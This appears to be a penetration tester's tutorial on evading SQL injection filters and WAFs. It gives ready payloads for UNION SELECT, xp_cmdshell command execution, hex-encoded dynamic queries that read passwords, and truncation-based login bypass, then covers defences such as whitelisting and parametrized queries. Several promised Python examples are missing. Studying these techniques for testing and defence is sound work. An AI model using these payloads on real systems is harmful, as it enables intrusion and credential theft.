    1-To confuse, bewilder, or stupefy.
    2-To make obscure or unclear: to obfuscate a problem with extraneous information.
    3-To darken."

    Web applications frequently employ input filters that are designed to defend against common attacks, including SQL injection. These filters may exist within the application's own code, in the form of custom input validation, or may be implemented outside the application, in the form of Web application firewalls (WAF's) or intrusion prevention systems (IPS's). Usually this types of filters are called virtual patches. After you read this article should be able to understand that virtual patching is not going to protect you from advanced attackers.



    Common types of SQL filters

    In the context of SQL injection attacks, the most interesting filters you are likely to encounter are those which attempt to block any input containing one or more of the following:

    1-SQL keywords, such as SELECT, AND, INSERT
    2-Specific individual characters, such as quotation marks or hyphens
    3-White-spaces 

    You may also encounter filters which, rather than blocking input containing the items in the preceding list, attempt to modify the input to make it safe, either by encoding or escaping problematic characters or by stripping the offending items from the input and processing what is left in a normal way, which by the way is not logical because if someone would want to harm your Web Application what for you would want to process his malicious input.

    Often, the application code that these filters protect is vulnerable to SQL injection (because incompetent, ignorant or badly payed developers exist all over the world), and to exploit the vulnerability you need to find a means of evading the filter to pass your malicious input to the vulnerable code. In the next few sections, we will examine some techniques that you can use to do just that.

    Bypassing SQL Injection filters

    The are numerous ways to by pass SQL injection filters, there even more ways to exploit them too. The most common way of evading SQL injection filters are:

    1-Using Case Variation
    2-Using SQL Comments
    3-Using URL Encoding
    4-Using Dynamic Query Execution
    5-Using Null Bytes
    6-Nesting Stripped Expressions
    7-Exploiting Truncation
    8-Using Non-Standard Entry Points
    9-Combine all techniques above 

    Take notice that all the above SQL injection filter bypassing techniques are based on the black list filtering mentality, and not the white list filtering logic. This means that bad software development is based in black list filters concept. 

    Using Case Variation

    If a keyword-blocking filter is particularly naive, you may be able to circumvent it by varying the case of the characters in your attack string, because the database handles SQL keywords in a case-insensitive manner. For example, if the following input is being blocked:

    ' UNION SELECT @@version --

    You may be able to bypass the filter using the following alternative:

    ' UnIoN sElEcT @@version --

    Note: Using only uppercase or only lower case might also work, but I would not suggest spending a lot of time in that type of fuzzing.

    Using SQL Comments

    You can use in-line comment sequences to create snippets of SQL which are syntactically unusual but perfectly valid, and which bypass various kinds of input filters. You can circumvent various simple pattern-matching filters in this way.

    Of course, you can use this same technique to bypass filters which simply block any white-space whatsoever. Many developers wrongly believe that by restricting input to a single token they are preventing SQL injection attacks, forgetting that in-line comments enable an attacker to construct arbitrarily complex SQL without using any spaces.

    In the case of MySQL, you can even use in-line comments within SQL keywords, enabling many common keyword-blocking filters to be circumvented. For example, the following attack will still work if the back-end database is MySQL if you only check for spaces to SQL injection strings:

    ' UNION/**/SELECT/**/@@version/**/-- Or ' U/**/NI/**/ON/**/SELECT/**/@@version/**/--


    Note: This type of filter bypassing methodology covers gap filling and black list bad character sequence filtering.

    Using URL Encoding

    URL encoding is a versatile technique that you can use to defeat many kinds of input filters. In its most basic form, this involves replacing problematic characters with their ASCII code in hexadecimal form, preceded by the % character. For example, the ASCII code for a single quotation mark is 0x27, so its URL-encoded representation is %27.In this situation, you can use an attack such as the following to bypass a filter:

    Original query:

    ' UNION SELECT @@version --

    URL-encoded query:

    %27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%40%40%76%65%72%73%69%6f%6e%20%2d%2d

    In other cases, this basic URL-encoding attack does not work, but you can nevertheless circumvent the filter by double-URL-encoding the blocked characters. In the double encoded attack, the % character in the original attack is itself URL-encoded in the normal way (as %25) so that the double-URL-encoded form of a single quotation mark is %2527.If you modify the preceding attack to use double-URL encoding, it looks like this:

    %25%32%37%25%32%30%25%35%35%25%34%65%25%34%39%25%34%66%25%34%65%25
    %32%30%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32
    %30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39
    %25%36%66%25%36%65%25%32%30%25%32%64%25%32%64

    Note: You should also take into consideration that selective URL-encoding is also a valid way to by pass SQL injection filtering.

    Double-URL encoding sometimes works because Web applications sometimes decode user input more than once, and apply their input filters before the final decoding step. In the preceding example, the steps involved are as follows:

    1-The attacker supplies the input ‘%252f%252a∗/UNION …
    2-The application URL decodes the input as ‘%2f%2a∗/ UNION…
    3-The application validates that the input does not contain /∗ (which it doesn't).
    4-The application URL decodes the input as ‘/∗∗/ UNION…
    5-The application processes the input within an SQL query, and the attack is successful. 

    A further variation on the URL-encoding technique is to use Unicode encodes of blocked characters. As well as using the % character with a two-digit hexadecimal ASCII code, URL encoding can employ various Unicode representations of characters. There is a very good web site you can use to test various types of encoding here. The SQL Injection query when unicode encoded looks like this:

    27 20 55 4E 49 4F 4E 20 53 45 4C 45 43 54 20 40 40 76 65 72 73 69 6F 6E 20 2D 2D


    Note: I have not been experimenting a lot with unicode encoding and frankly I do not think it is going to be very useful fuzzing SQL with Unicode encoding.

    Further, because of the complexity of the Unicode specification, decoders often tolerate illegal encoding and decode them on a “closest fit” basis. If an application's input validation checks for certain literal and Unicode-encoded strings, it may be possible to submit illegal encoding of blocked characters, which will be accepted by the input filter but which will decode appropriately to deliver a successful attack.

    Using the CAST and CONVERT keywords


    Another subcategory of encoding attacks is the CAST and CONVERT attack. The CAST and CONVERT keyword explicitly converts an expression of one data type to another more over the CAST keyword is embedded to MySQL, MSSQL and Postgre databases. It has been used by various types of malware attacks in numerous web sites and is a very interesting SQL injection filter bypass. The most infamous botnet that used this type of attack was ASPRox botnet virus. Have a look at the syntax:

    Using CAST:
           CAST ( expression AS data_type )
    Using CONVERT:
            CONVERT ( data_type [ ( length ) ] , expression [ , style ] )

    With CAST and CONVERT you have similar filtering by passing results with with the function SUBSTRING, an example can show you what I mean. The following SQL queries will return the same result back:

    SELECT SUBSTRING('CAST and CONVERT', 1, 4)

    Returned result: CAST

    SELECT CAST('CAST and CONVERT' AS char(4))
    Returned result: CAST


    SELECT CONVERT(varchar,'CAST',1)

    Returned result: CAST

    Note: See that both SUBSTRING and CAST keywords behave the same and can also be used for blind SQL injection attacks (you can try to test this queries with sqlzoo.net).

    Further expanding on CONVERT and CAST we can identify that also the following SQL queries are valid and also very interesting, see how we can extract the MSSQL database version with CAST and CONVERT:

    1st Step: Identify the query to execute:

    SELECT @@VERSION

    2nd Step: Construct the query based on keywords CAST and CONVERT:

    SELECT CAST('SELECT @@VERSION' AS VARCHAR(16))
    OR
    SELECT CONVERT(VARCHAR,'SELECT @@VERSION',1)

    3rd Step: Execute the query using the keyword EXEC:

    SET @sqlcommand = SELECT CONVERT(VARCHAR,'SELECT @@VERSION',1)

    EXEC(@sqlcommand) 


    OR convert first the SELECT @@VERSION to Hex


    SET @sqlcommand = (SELECT CAST(0x53454C45435420404076657273696F6E00 AS VARCHAR(34))

    EXEC(@sqlcommand)


    Note: See how creative you can become with CAST and CONVERT. Now since the type of data that is contained in the sentence CAST is hexadecimal a varchar conversion is performed.

    You can also use nested CAST and CONVERT queries to inject your malicious input. That way you can start interchanging between different encoding types and create more complicated queries. This should be a good example:

    CAST(CAST(PAYLOAD IN HEX, VARCHAR(CHARACTER LENGTH OF PAYLOAD)),, VARCHAR(CHARACTER LENGTH OF TOTAL PAYLOAD)


    Note: See how simple is it.

    Using Dynamic Query Execution


    Many databases allow SQL queries to be executed dynamically, by passing a string containing an SQL query into a database function which executes the query. If you have discovered a valid SQL injection point, but find that the application’s input filters are blocking queries you want to inject, you may be able to use dynamic execution to circumvent the filters. Dynamic query execution works differently on different databases.

    On Microsoft SQL Server, you can use the EXEC function to execute a query in string form. For example:

    'EXEC xp_cmdshell ‘dir’; — Or 'UNION EXEC xp_cmdshell ‘dir’; —


    Note: Using the EXEC function you can enumerate all enabled stored procedures in the back end database and also map assigned privileges to stored procedures.

    In Oracle, you can use the EXECUTE IMMEDIATE command to execute a query in string form. For example:

    DECLARE pw VARCHAR2(1000);
    BEGIN
    EXECUTE IMMEDIATE 'SELECT password FROM tblUsers' INTO pw;
    DBMS_OUTPUT.PUT_LINE(pw);
    END;


    Note: You can do that line by line or all together, of course other filter by passing methodologies can be combined with this one.

    The above SQL injection attack type can be submitted to the web application attack entry point, either the way it is presented above or as a batch of commands separated by semicolons when the back end database accepts batch queries (e.g. MSSQL).

    For example in MSSQL you could do something like this:


    SET @MSSQLVERSION = SELECT @@VERSION; EXEC (@MSSQLVERSION); --
    Note: The same query can be submitted from different web application entry points or the same.

    Databases provide various means of manipulating strings, and the key to using dynamic execution to defeat input filters is to use the string manipulation functions to convert input that is allowed by the filters into a string which contains your desired query. In the simplest case, you can use string concatenation to construct a string from smaller parts. Different databases use different syntax for string concatenation.

    For example, if the SQL keyword SELECT is blocked, you can construct it as follows:



    Oracle: 'SEL'||'ECT'
    MS-SQL: 'SEL'+'ECT'
    MySQL: 'SEL' 'ECT'


    Further examples of this SQL obfuscation method would be:


    Oracle: UN’||’ION SEL'||'ECT NU’||’LL FR’||’OM DU’||’AL--
    MS-SQL: ' un’+’ion (se’+’lect @@version) --
    MySQL: ' SE’’LECT user(); #

    Note: that SQL Server uses a + character for concatenation, whereas MySQL uses a space. If you are submitting these characters in an HTTP request, you will need to URLencode them as %2b and %20, respectively. Going further, you can construct individual characters using the CHAR function (CHR in Oracle) using their ASCII character code. For example, to construct the SELECT keyword on SQL Server, you can use:

    CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)


    Note: The Firefox plug-in tool called Hackbar is also doing that automatically (for a long time now).

    You can construct strings in this way without using any quotation mark characters. If you have an SQL injection entry point where quotation marks are blocked, you can use the CHAR function to place strings (such as ‘admin’) into your exploits. Other string manipulation functions may be useful as well. For example, Oracle includes the functions REVERSE, TRANSLATE, REPLACE, and SUBSTR. Another way to construct strings for dynamic execution on the SQL Server platform is to instantiate a string from a single hexadecimal number which represents the string’s ASCII character codes. For example, the string:

    SELECT password FROM tblUsers


    Can be constructed and dynamically executed as follows:


    DECLARE @query VARCHAR(100)
    SELECT @query = 0x53454c4543542070617373776f72642046524f4d2074626c5573657273
    EXEC(@query)


    Note:
    The mass SQL injection attacks against Web applications that started in early 2008 employed this technique to reduce the chance of their exploit code being blocked by input filters in the applications being attacked.

    Using Null Bytes


    Often, the input filters which you need to bypass in order to exploit an SQL injection vulnerability are implemented outside the application's own code, in intrusion detection systems (IDSs) or WAFs. For performance reasons, these components are typically written in native code languages, such as C++. In this situation, you can often use null byte attacks to circumvent input filters and smuggle your exploits into the back-end application.

    Null byte attacks work due to the different ways that null bytes are handled in native and managed code. In native code, the length of a string is determined by the position of the first null byte from the start of the string—the null byte effectively terminates the string. In managed code, on the other hand, string objects comprise a character array (which may contain null bytes) and a separate record of the string's length. This difference means that when the native filter processes your input, it may stop processing the input when it encounters a null byte, because this denotes the end of the string as far as the filter is concerned. If the input prior to the null byte is benign, the filter will not block the input.

    However, when the same input is processed by the application, in a managed code context, the full input following the null byte will be processed, allowing your exploit to be executed. To perform a null byte attack, you simply need to supply a URL-encoded null byte (that looks like this ) prior to any characters that the filter is blocking. In the original example, you may be able to circumvent native input filters using an attack string such as the following:

    ' UNION SELECT password FROM tblUsers WHERE username='admin'--


    Note: When access is used as a bank end database NULL bytes can be used as SQL query delimiter.

    Nesting Stripped Expressions

    Some sanitizing filters strip certain characters or expressions from user input, and then process the remaining data in the usual way. If an expression that is being stripped contains two or more characters, and the filter is not applied recursively, you can normally defeat the filter by nesting the banned expression inside itself.

    For example, if the SQL keyword SELECT is being stripped from your input, you can use the following input to defeat the filter:


    SELSELECTECT


    Note:
    See the simplicity of bypassing the stupid filter.

    Exploiting Truncation

    Sanitizing filters often perform several operations on user-supplied data, and occasionally one of the steps is to truncate the input to a maximum length, perhaps in an effort to prevent buffer overflow attacks, or accommodate data within database fields that have a predefined maximum length.Consider a login function which performs the following SQL query, incorporating two items of user-supplied input:

    SELECT uid FROM tblUsers WHERE username = 'jlo' AND password = 'r1Mj06'


    Suppose the application employs a sanitizing filter, which performs the following steps:


    Doubles up quotation marks, replacing each instance of a single quote (‘) with two single quotes (“)
    Truncates each item to 16 characters. If you supply a typical SQL injection attack vector such as:

    admin'--


    The following query will be executed, and your attack will fail:


    SELECT uid FROM tblUsers WHERE username = 'admin''--' AND password = ''


    Note: The doubled-up quotes mean that your input fails to terminate the username string, and so the query actually checks for a user with the literal username you supplied. However, if you instead supply the username aaaaaaaaaaaaaaa' which contains 15 a’s and one quotation mark, the application first doubles up the quote, resulting in a 17-character string, and then removes the additional quote by truncating to 16 characters. This enables you to smuggle an unescaped quotation mark into the query, thus interfering with its syntax:

    SELECT uid FROM tblUsers WHERE username = 'aaaaaaaaaaaaaaa'' AND password = ''


    Note: This initial attack results in an error, because you effectively have an unterminated string

    Each pair of quotes following the a’s represents an escaped quote, and there is no final quote to delimit the user-name string. However, because you have a second insertion point, in the password field, you can restore the syntactic validity of the query, and bypass the login, by also supplying the following password:

    or 1=1--

    This causes the application to perform the following query:

    SELECT uid FROM tblUsers WHERE username = 'aaaaaaaaaaaaaaa'' AND password = 'or 1=1--'


    When the database executes this query, it checks for table entries where the literal username is


    aaaaaaaaaaaaaaa' AND password =


    which is presumably always false, or where 1 = 1, which is always true. Hence, the query will return the UID of every user in the table, typically causing the application to log you in as the first user in the table. To log in as a specific user (e.g., with UID 0), you would supply a password such as the following:

    or uid=0--



    Note:
    This query is considered to be a very old technique used for authentication bypass or privilege escalation.

    Using fuzzdb for Web Application black box testing
    Fuzzdb aggregates known attack patterns, predictable resource names, server response messages, and other resources like web shells into the most comprehensive Open Source database of malicious and malformed input test cases. Using fuzzdb attack patterns to test Web Applications is a must nowadays. Importing the fuzzdb lists to Web Fuzzers should be very common if you want to get some real results. If you use fuzzdb along with Burp Scanner, Intruder and all other features you are definitely going to get better results even from any Web Application Scanner.

    What's in fuzzdb?

    So what is fuzzdb?
    1-Fuzzdb is a collection of attack patterns: Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases. FuzzDB contains comprehensive lists of attack payloads known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.

    2-Fuzzdb is a collection of response analysis strings: Since system responses also contain predictable strings, fuzzdb contains a set of regex pattern dictionaries such as interesting error messages to aid detection software security defects, lists of common Session ID cookie names, and more.

    3-Fuzzdb is a collection of other useful stuff: Webshells, common password and username lists, and some handy wordlists.

    4-Fuzzdb is a collection of : Documentation - Helpful documentation and cheat sheets sourced from around the web that are relevant to the payload categories.

    Mutating fuzzdb payloads using Python

    With Python you can very easily mutate all interesting attack patterns concerning SQL injection, feed them to Burp Intruder as an attack list and use them to test Web Applications. There are numerous code examples for Python and even a very novice programmer can learn text manipulation with Python. The two basic modules you will have to use to perform the mutations are:

    1-Standard module: string
    2-Standard module: re

    The string module contains several types of things, such as functions, methods, and classes; it also contains strings of common constants.The re module obsoletes the regex and regsub modules that you may see used in some older Python code. While there are still a few, limited advantages to regex , they are minor and it is not worth using in new code.

    About Python regular expressions


    A regular expression in Python is a concise way of describing a pattern that might occur in a text. With Python regular expressions you can answer questions such as:

    1-Do certain characters occur?
    2-In a particular order?
    3-Are sub-patterns repeated a given number of times?
    4-Do other sub-patterns exclude a match?

    Conceptually, this is not unlike the way you would intuitively describe a pattern in a natural language. The trick is encoding this description in the compact syntax of regular expressions.When approaching a regular expression, treat it as its own programming problem, even though only one or two lines of code may be involved; those lines effectively form a small program.

    URL-encoding using Python


    Mutating payloads is easy with Python, so when you would want to URL encode the SQL injection inputs from fuzzdb you can use the very simple Python script displayed below:


    Note: In the above example you can see how easy is to URL-encode the fuzzdb list and then feed the output to Burp Intruder to test the application. It is obviously not the best Python code for URL encoding but I had no time so I did it the nasty way.

    Gap filter by passing using Python


    With Python you can very easily replace the gaps with the following character sequence /**/ the following code shows exactly that:





    Note: See how easy and simple is SQL comment gap replacement. You can use not only SQL comment to fill the gaps but also insert within the ordinary SQL queries.

    Again with Python you can very easily replace the gaps with the following character sequence %20 the following code shows exactly that:





    Note: Again see how easy and simple is this (the special character sequence will be removed from the Web app).

    Using Null Bytes with Python to bypass filters


    With Python you can very easy concatenate the null character at the begging of the line, the following code shows exactly that:
    Note: Again see how easy and simple is to add at the begging of each line the null character.

    Analyzing SQL Injection counter measures

    The only ways someone should defend against SQL Injection attacks are the following and only the following:

    1-White list filters
    2-Black and white list hybrid filters (not only black list filters)
    3-Parametrized SQL queries
    4-Stored procedures with proper privilege assignments

    White list filters

    White list filtering should be easy to understand, you just use a Web Server control that accepts only certain set of characters and rejects all other set of characters, the following concept is presented below:





    Note:
    The white list filter accepts only ASCII characters and reject all other characters (this is an example and does not mean that SQL Injection is blocked by allowing ASCII character set).

    White list filtering should be your first choice when implementing Web Application filtering mechanisms, especially when the input is very specific, such as credit card numbers. Also white list filtering has better performance when compared to black list filters with long black lists.

    Black list filters

    Black list filtering should also be easy to understand, you just use a Web Server control that rejects only certain sets of characters and accept all other, the following concept is presented below:




    Note: Black list filters reject only single quotes and accept all other characters (this is an example and does not mean that SQL Injection is prevented by blocking single quote characters).

    Why people use black list filters? Simple because they want to find an easy solution to protect multiple Web Applications with generic SQL black list filters that apply for all their Web Applications Infra-structure. If someone would want for example to protect his/her Web Application he/she would block single quote for all Web Applications and that way add an extra layer of security (or at least that is what he/she thinks). It is also common knowledge that in order to properly configure a Web Application Firewall you would have to be a Web System Administrator and a Web Developer at the same time, which in most companies does not happen. WAF's give you the option of properly configuring white list filters if you know how the Web Application works (e.g. Http request throttling, allowed character set per html form e.t.c) but in the majority of the situations the developer of the web application, to be protected, is not going to do the WAF configuration.

    For the reasons explained above black list filtering methodology is unfortunately adopted by many developers and vendors that develop IPS/IDS, WAF's and firewall devices. Developers and system engineers lack of imagination and are not really interested into bypassing their own filters or doing a good job on understanding hacking.

    IMPORTANT NOTE: If you believe that you have an important Web Application and you need to protect it then DO NOT:

    1-Think that the company WAF/IPS is going to block any advanced SQL Injection attack.
    2-Use black list filtering, it is WRONG because most of the time does not provide real world protection.
    3-Use automated only web security scanners to test business critical web sites. Note: Manual penetration      testing is essential before deploying business critical Web Applications to production.

    Black and white list hybrid filters


    Black and White list hybrid filtering again should be also easy to understand, you just use a Web Server control that first accepts certain sets of characters and then rejects a certain character sequence of the accepted set of characters. This type of filter is the most effective and should be used as an alternative of white list filtering ONLY AND ONLY IF WHITE LIST FILTERING DOES NOT DO THE JOB.



    Note: The white/black list hybrid filter displayed above accepts ASCII code and then from the accepted set of characters single quote is filtered out. This would have meaning if for example you would want to accept single quotes in a certain position, for example you might want to allow the string Mr Smith's but not Mr' Smiths. You can do that if you implement "both type of filters" into a single regular expression.

    It is important to understand that when using white/black list hybrid filters to sanitize your input it means that you have excluded white list filtering because it is not going to do the job the proper way. It should also be noticed that the black list filter functionality is better to be applied after the white list filter for performance reasons (imagine having a long ugly list of character sequences to run though your input). It should also be clear by now that again when you use white/black list hybrid filtering in the black list filter part you would want to filter certain characters based on:

    The position within the user supplied input (e.g. if you allow the + character then it should not be placed within strings such as var+iable, where variable is a critical web application variable).
    Certain sequences of bad characters but not the characters themselves (e.g. block '-- , '# or '+' but do not block ++).Note: Filtering user malicious input is not so difficult, you just have to have the correct mentality.
    Web Application Firewall black list mentality

    I talked about white list filtering, I talked about black list filtering, I even mentioned about hybrid filters. What I did not talk about is the Black list filter mentality that "lives" in big and profitable organizations. In "profitable" big organizations such as banks or big software vendors you will find something that they call information technology (IT) operation team (ITOPT). ITOPT is responsible for deploying the Web Applications, applying proper patches and making sure that everyone is happy and everything is up and running. Now what happens is that these guys will ask from information security consultants that have never performed a single decent Web Application penetration test in their life to help them deploy THE Web Application Firewall (WAF). So what happens next is for them to propose a simple low cost black list filtering approach. Why? Because it is an easy and generic solution (sounds like a smart move e?). DAAAA this is when the trouble starts, applying the same black list filter for all the custom company Web Applications is Wrong.

    The following picture shows a conceptual representation of bad WAF configuration:



    Note: You see what is wrong here. The same filter is applied on all Web Applications, with out taking into consideration the special needs of each Web Application separately.

    Parametrized SQL queries


    With most development platforms, parametrized statements can be used and work with type fixed parameters (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store the value of the given type and not the arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value.

    Stored procedures with proper privilege assignments

    Stored procedures are implemented differently in every database, so for each database we will give a different definition:

    For MSSQL: Stored procedures in MSSQL means pre-compiled execution. SQL Server compiles each stored procedure once and then re-utilizes an execution plan invoking the stored procedure. This results in a tremendous performance boost when stored procedures are called repeatedly and also there is a forced type casting protection.

    For MySQL: Stored procedures increases the performance of the application. Once created, a stored procedure is compiled and stored in the database catalog. It runs faster than uncompiled SQL commands which are sent from the application and of course compiled code means type casting safety.

    For Oracle: Stored procedures provide a powerful way to code application logic that can be stored on the server. The language used to code stored procedures is a database-specific procedural extension of SQL (in Oracle it is PL/SQL), dynamic SQL can be used in:

    EXECUTE IMMEDIATE statements
    DBMS_SQL package
    Cursors Tools that can obfuscate for you

    For these type of attacks there is a tool written by Gerasimos Kassaras (this is me) that can obfuscate SQL payloads (and other payloads), it is the Teenage Mutant Ninja Turtle tool project which you can download from here.

    The Teenage Mutant Ninja Turtles project is four things:


    1-A Web Application payload database.
    2-A Web Application error database.
    3-A Web Application payload mutator.
    4-A Web Application payload manager.

    Nowadays all high profile sites found in financial and telecommunication sector use filters to filter out all types of vulnerabilities such as SQL, XSS, XXE, Http Header Injection e.t.c. In this particular project I am going to provide you with a tool to generate Obfuscated Fuzz strings in order to bypass badly implemented Web Application injection filters (e.t.c SQL, XSS and Path-traversal Injections e.t.c). Also with Teenage Mutant Ninja Turtles you will be able to do payload management by generating custom payload lists to test thoroughly your Web Application for all type of vulnerabilities such path traversal and SQL obfuscated payloads.

    Epilogue


    This article aims to become a complete guide for bypassing SQL injection filtering (meaning I am going to do regular updates) used by a wide range of web applications.

    Reference:


        The Web Application Hacker’s Handbook (Second Edition)
        SQL Injection Attack and defence (First Edition)